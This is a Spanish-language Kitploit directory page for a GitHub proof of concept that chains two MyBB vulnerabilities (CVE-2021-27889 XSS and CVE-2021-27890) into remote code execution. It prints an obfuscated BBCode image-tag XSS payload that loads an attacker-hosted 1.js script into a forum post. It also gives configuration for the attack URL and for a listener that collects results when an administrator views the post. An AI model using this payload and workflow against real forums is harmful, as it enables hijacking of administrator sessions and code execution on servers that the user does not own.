Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mybb-XSS_SQL_RCE-POC — MyBB asocia CVE-2021-27890 y CVE-2021-27889 al PoC de RCE. | Kitploit
Herramientas/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Generación de PayloadsExplotaciónExplotación de Aplicaciones Web
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

MyBB asocia CVE-2021-27890 y CVE-2021-27889 al PoC de RCE.

Ver Repositorio
102hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Mybb-XSS_SQL_RCE-POC

Mybb relaciona CVE-2021-27890 & CVE-2021-27889 con el PoC de RCE

Antes de usar:

Hay dos archivos aquí: 1.js y attack_listen.py

Debes modificar estos dos archivos:

1.js:

modifica la URL del foro MyBB y la URL del ataque:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

modifica el host de ataque y el puerto de ataque:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

Uso:

CVE-2021-27889 es XSS. Debes inyectar el siguiente payload en "New Post Thread", "Reply" o "Private Messages" antes de realizar el ataque. En esta demo, envío el payload a "New Post Thread".

Ten en cuenta que 192.168.92.165 es la IP del servidor malicioso; debes cambiarla.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Ahora nuestro JS malicioso 1.js se ha inyectado con éxito. Luego debemos esperar a que un administrador visite esta publicación con la cookie de sesión de la página de administración.

Nota: el usuario administrador no necesita iniciar sesión en la página del foro.


Durante el tiempo de espera, debemos ejecutar "attack_listen.py" en nuestra máquina de ataque para identificar si el usuario administrador ha sido atacado.

root@kitploit:~
python3 attack_listen.py

Cuando el usuario administrador visite la publicación maliciosa, el JS malicioso realizará el ataque:


Podemos recibir la información en nuestra máquina de ataque:

Descargar herramienta